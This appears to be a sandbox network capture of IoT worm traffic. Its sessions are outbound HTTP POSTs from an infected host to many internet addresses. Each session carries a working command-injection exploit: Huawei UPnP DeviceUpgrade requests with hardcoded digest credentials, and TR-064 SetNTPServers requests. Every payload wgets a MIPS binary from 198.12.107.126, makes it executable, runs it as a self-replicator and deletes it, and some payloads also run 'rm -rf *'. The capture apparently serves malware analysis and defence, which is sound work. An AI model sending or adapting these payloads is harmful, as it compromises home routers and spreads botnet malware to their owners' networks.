                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          105192.168.2.1351398157.61.168.14237215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.565684080 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          106192.168.2.1333914157.80.225.3637215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.567254066 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          107192.168.2.1335142157.225.168.15637215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.568686008 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          108192.168.2.1338290157.80.236.24937215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.570352077 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          109192.168.2.1339768157.8.44.5537215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.571877003 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          110192.168.2.1343150157.29.123.10437215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.573453903 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          111192.168.2.1348234160.156.163.1957547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.768152952 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          112192.168.2.1342460189.205.54.1957547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.770318985 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          113192.168.2.133949271.98.72.1137547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.794091940 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          114192.168.2.134196667.22.59.1367547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.796046019 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          115192.168.2.133507236.189.225.557547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.798157930 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          116192.168.2.133594696.229.242.1647547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.800096989 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          117192.168.2.133781690.201.142.1227547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.862678051 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          118192.168.2.134994493.165.93.727547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.862750053 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          119192.168.2.135844478.196.170.647547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:04.862787962 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
